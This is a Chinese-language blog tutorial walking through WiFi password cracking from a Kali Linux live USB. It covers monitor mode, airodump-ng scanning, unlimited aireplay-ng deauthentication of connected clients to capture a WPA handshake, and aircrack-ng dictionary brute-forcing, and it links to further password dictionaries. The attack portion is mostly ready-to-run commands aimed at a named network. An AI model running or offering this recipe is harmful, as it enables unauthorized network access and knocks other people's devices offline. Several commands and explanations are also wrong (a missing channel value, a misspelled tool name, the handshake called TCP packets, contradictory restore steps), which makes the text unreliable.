環境準備:
方式一(選擇該方式):Kali Linux、筆記本一臺、U盤(至少8G)
方式二:Kali Linux、外置網卡、筆記本一臺、VM
特別說明,主要是使用方式一進行破解,如果有外置網卡,那就非常簡單了,直接通過vm外接網卡即可,
注:制作kali啟動鏡像前,U盤里的資料一定要備份、備份、備份,
1.balenaEtcher安裝
該軟體是用來制作鏡像的工具,也可以使用其它的,不過不推薦,試過其它幾款,還不如這個一鍵制作好用,
2.制作kali啟動鏡像
等待3-5分鐘.注:在制作程序中,會彈出'初始化'的視窗,取消或者關閉就行,不要點擊格式化,否則會讓制作的鏡像白費,需要重新來一次,
完成,
3.開機啟動設定
(1).進入bios界面
自己的電腦型號對應不同按鍵的啟動bios方式不同,常用的筆記本型號的進入bios方式,如下圖所示,其它型號的可自行百度往下看,(如,百度搜索'華碩筆記本進入bios按鍵'),
(2).設定啟動項的順序
設定U盤啟動項的順序可自行百度,比較簡單,這里不再敘述,
如果出現'Secure Boot Violation'等資訊,那么我們就需要關閉筆記本的保護模式,方法大同小異,這是界面外觀可能不一樣,內容是一樣的,當完成實驗后,要把系統保護改回來,
[1].傳統方式具體操作步驟往下看:
①.進入Bios設定頁面
②.security頁面
進入[Security]頁面(1),選擇[Secure Boot](2)專案
③.安全啟動功能關閉
選擇[Secure Boot Control]專案(3),并設定為[Disabled](4),部分機種可能只有[Secure Boot]而沒有[Secure Boot Control],則請選擇[Secure Boot]并設定為[Disable],
④. 保存設定并退出
進入[Save & Exit]頁面(5),選擇[Save Changes and Exit](6)后并選擇[Yes](7),
[2].UEFI方式具體操作步驟往下看:
①.進入BIOS設定頁面后,使用快捷鍵[F7]、或是滑鼠點選(1)進入進階模式,
②.進入[Security]頁面,選擇[Secure Boot]專案,
③.安全啟動功能關閉
選擇[Secure Boot Control]專案(4),并設定為[Disabled](5),部分機種可能只有[Secure Boot]而沒有[Secure Boot Control],則請選擇[Secure Boot]并設定為[Disable],
④.存盤設定并退出
進入[Save & Exit]頁面(6),選擇[Save Changes and Exit](7)后并選擇[Yes](8),或者按F10保存
4.啟動kali
注意:這一步一定不能馬虎,一定要快速選擇'kali live'模式,一定不能選擇'install kali',也不能長時間不動,否則就等著重裝系統、資料不見等一系列的問題,
5.無線wifi破解實驗
(1).ifconfig
命令ifconfig查看網卡資訊,有wlan0表示網卡能夠用來破解wifi,
|
root@kali:~# ifconfig |
(2).airmon-ng
使用命令airmon-ng start wlan0開啟網卡監聽模式,
|
root@kali:~# airmon-ng start wlan0 |
(3).iwconfig
使用iwconfig命令查看網卡資訊, wlan0mon網卡名加了mon則表示'監聽模式'開啟成功,
|
root@kali:~# iwconfig |
(4).airodump-ng掃描
使用命令airodump-ng wlan0mon,開始掃描WiFi,按ctrl+c結束任務,
|
root@kali:~# airodump-ng wlan0mon |
|
引數 |
意義 |
|
BSSID |
wifi的MAC地址 |
|
PWR |
信號強弱程度,數值越小信號越強 |
|
DATA |
資料量,越大使用的人就越多 |
|
CH |
信道頻率(頻道) |
|
ESSID |
wifi的名稱,中文可能會有亂碼 |
(5).抓包
接著輸入airodump-ng --bssid BSSID -c 信道頻率 -w 抓包存盤的路徑 wlan0mon,注,--bssid后面跟著的是'BSSID(MAC地址)',-c后面跟著的是'CH(信道)',-w后面跟著抓到的包保存到哪,最后是網卡資訊'wlan0mon',
如:我想要破解ESSID為TP-LINK_961A4A的無線wifi,格式為:
|
root@kali:~# airodump-ng --bssid 38:83:45:96:1A:4A -c -w /opt/catchWiFi wlan0mon |
資料包已經正在抓取,等待一會,如果抓取不到資料.接著往下看
另起終端,輸入格式為'airepaly-ng -0 0 -c STATION(任選其一) -a bssid 網卡名(一般為wlan0mon)',不過STATION最好選擇手機的熱點,如果不清楚手機的mac地址那么可以任選其一,選擇手機的好處是可以手動設定斷線,讓其抓取到包,如果運氣不好,那么就試四個把,
如:我想要攻擊STATION(MAC地址)為,格式為:
|
root@kali:~# aireplay-ng -0 0 -c 38:83:45:96:1A:4A -a 14:95:CE:BB:53:A8 wlan0mon |
每個引數的意義
|
(0 WiFi設備無限次數,-0 8則攻擊8次,攻擊原理是:先讓設備掉線,設備會再自動連接,并發這個自動連接程序會進行三次握手,會發送tcp包(里面包含加密的密碼資料),我方偽裝成WiFi熱點去竊取該資料包,我方竊取后即可用字典窮舉法暴力破解加密的WiFi密碼, 資料包里面的密碼是哈希加密的,哈希加密只能正向) |
當'airodump-ng --bssid BSSID'視窗出現WPA handshake時,表示抓包成功,這里有一個小技巧讓其抓到包,讓手機連接的wifi斷開,然后重新連接wifi,簡單說,把手機WiFi重新關開即可,
出現'WPA handshake時'時,需要讓兩個終端都按Ctrl+c停止,不然會一直斷網的,
查看抓到的資料包.cd打開抓包的目錄,ls列出來,就看到我們抓到的資料包
(6).解壓kali字典檔案
解壓kali自帶的字典檔案.路徑:/usr/share/wordlists/rockyou.txt.gz
|
root@kali:~# gzip -d/usr/share/wordlists/rockyou.txt.gz |
(7).跑包(破解密碼)
格式:aircrack-ng -w 字典路徑 握手包路徑,回車后開始爆破,
運氣有一些差,抓到了三個cap包,一個沒跑成功,但是怎么能放棄,毛主席說過,沒有條件創造條件,如果抱著一定要跑出來的決心,就接著往下看,
|
root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt /opt/catchWifi-01.cap root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt /opt/catchWifi-02.cap root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt /opt/catchWifi-03.cap |
方法,就是把我們正確的wifi密碼加入到'密碼字典(rockyou.txt)'中去,然后重新來一次,跑包,成功了,,,,,,,
|
#添加'root123..'到rockyou密碼字典中 root@kali:~# vim /usr/share/wordlists/rockyou.txt root123.. |
特別說明:暴力破解并不簡單,需要足夠強大的字典和時間,可以通過字典生成工具生成自己的字典,字典越強大越容易破解,
其它密碼字典:鏈接:https://pan.baidu.com/s/1dL_AqQ4nBb5eBJHA47Eq1g 提取碼:23fp
6.恢復保護系統
[1].傳統方式'安全啟動功能開啟'具體操作步驟往下看:
選擇[Secure Boot Control]專案(3),并設定為[Disabled](4),部分機種可能只有[Secure Boot]而沒有[Secure Boot Control],則請選擇[Secure Boot]并設定為[Enabled],
[2].UEFI方式'安全啟動功能開啟'具體操作步驟往下看:
選擇[Secure Boot Control]專案(4),并設定為[Disabled](5),部分機種可能只有[Secure Boot]而沒有[Secure Boot Control],則請選擇[Secure Boot]并設定為[Enabled],看右手有保存的提示,華碩的是F10保存,
轉載請註明出處,本文鏈接:https://www.uj5u.com/caozuo/237962.html
標籤:Linux